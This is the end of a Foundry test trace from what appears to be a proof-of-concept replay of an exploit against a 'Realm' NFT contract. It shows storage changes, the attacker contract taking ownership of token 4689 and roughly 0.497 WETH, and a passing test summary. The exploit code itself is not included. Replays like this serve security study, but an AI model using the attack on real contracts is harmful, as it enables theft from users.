    │   │   │   @ 0x55d3384e9d5622b6be5d8e34c1cd6b8d87b7c23f8478d6cf4d35b933d250fb74: 0 → 1
    │   │   │   @ 0x405787fa12a823e0f2b7631cc41b3ba8828b3321ca811111fa75cd3aa3bb68ef: 0x000000000000000000000000cdcc535503cba9286489b338b36156b4b75008f6 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x429395017a52bb1dc38cb8266aa41981a987a1d952e1c19b73cb5d25357bef1e: 0 → 4689
    │   │   │   @ 0x85103cd2e94f564dae0f79a0ad9173f7591016f2da65160ae2122ec512c62083: 1 → 0
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 1
    │   │   │   @ 0x8159d7d19111120e3c029ea1e3407c9cdc36f82010752d0080414790f74956c1: 4689 → 0
    │   │   │   @ 0x5381d409d5c7c3674b86c2cab6f07690a943f9acd0540dc8f05d75d0cdb70543: 1 → 0
    │   │   └─ ← [Stop]
    │   ├─  storage changes:
    │   │   @ 0xc3e742d410d48da7c428edbe9a2d1e8424a0bcd568841060a9bd29cca19011b9: 1 → 0
    │   └─ ← [Stop]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 497010711179183339 [4.97e17]
    ├─ [2444] WETH::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker WETH balance after attack", val: 497010711179183339 [4.97e17], decimals: 18)
    ├─ [1118] Realm::ownerOf(4689) [staticcall]
    │   └─ ← [Return] ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    ├─ [0] VM::assertEq(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return]
    ├─ [686] Realm::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1
    ├─ emit log_named_uint(key: "Attacker Realm NFT balance after attack", val: 1)
    ├─  storage changes:
    │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000006f05b59d3b20000
    │   @ 0x6693fd66acae514ed2305cd0b7604a94266e750f2e1cc984901c9bc7c8726a57: 0 → 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c
    │   @ 0x6693fd66acae514ed2305cd0b7604a94266e750f2e1cc984901c9bc7c8726a5a: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 14.04s (12.79s CPU time)

Ran 2 test suites in 15.27s (14.53s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
